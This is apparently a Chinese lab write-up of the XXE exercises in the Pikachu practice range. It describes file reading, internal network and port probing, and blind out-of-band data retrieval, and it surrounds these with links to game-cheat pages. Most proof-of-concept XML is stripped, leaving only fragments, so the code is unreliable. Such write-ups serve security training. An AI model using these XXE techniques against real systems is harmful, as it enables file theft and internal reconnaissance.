Pikachu靶场之XXE漏洞
创始人
2025-05-31 02:58:30

Pikachu靶场之XXE漏洞

  • 一、XML和XXE的区别
  • 二、解题
      • 1.1 前提
      • 1.2 使用代码进行文件读取
      • 1.3 内网探针或攻击内网应用
      • 1.4 RCE
      • 1.5 无回显读取文件
      • 1.6 xxe绕过

一、XML和XXE的区别

XML是传递数据的一种格式,而XXE是XML传递数据过程中产生的一种漏洞,两者是完全不同的

二、解题

1.1 前提

  • 靶场地址:http://192.168.93.134/pikachu/vul/xxe/xxe.php
  • 靶机操作系统:Windows10

如下是文件地址:

在这里插入图片描述

1.2 使用代码进行文件读取

  1. 前提:

    对接收到的数据进行输出显示:

    在这里插入图片描述

  2. POC

    如下POC是固定格式,只需要更改文件地址就可以读取不同的文件

    

]>
&xxe;

    在这里插入图片描述

1.3 内网探针或攻击内网应用

  1. 前提:

    地址文件必须正确:

  2. POC

    	


]>
&rabbit;

    上面的ip地址假设就是内网的一台服务器的ip地址。还可以进行一个端口扫描,看一下端口是否开放。

1.4 RCE

需要引入外部实体,一般遇不到

1.5 无回显读取文件

POC代码


%dtd;%send;
]>

www目录下文件:

"
>
%payload;

1.6 xxe绕过

xxe绕过

上一篇:分享实测“新海贝之城究竟是不是有挂”其实确实有挂

下一篇:实测讲解.永州扯胡子到底是不是挂.详细开挂教程!

相关内容

热门资讯

罗永浩录音还未公布,华与华兄弟... 澎湃新闻记者 戴高城12月22日,读客文化(301025.SZ)的一纸停牌公告,将华楠、华杉兄弟推上...
万亿长沙银行换帅,“70后”女... 出品|达摩财经12月19日,长沙银行(601577.SH)发布公告称,该行董事会收到董事长赵小中的辞...
54岁恒隆集团CEO卢韦柏官宣... 红星资本局12月22日消息,日前,恒隆集团(00010.HK)、恒隆地产(00101.HK)联合公告...
智谱、MiniMax冲刺港交所... 出品|达摩财经AI独角兽正加速冲向资本市场,争夺“大模型第一股”的位置。12月21日,通用人工智能(...
吉利汽车与极氪整合完成 新京报贝壳财经讯 12月22日,吉利汽车控股有限公司(0175.HK)(简称“吉利汽车”)发布公告,...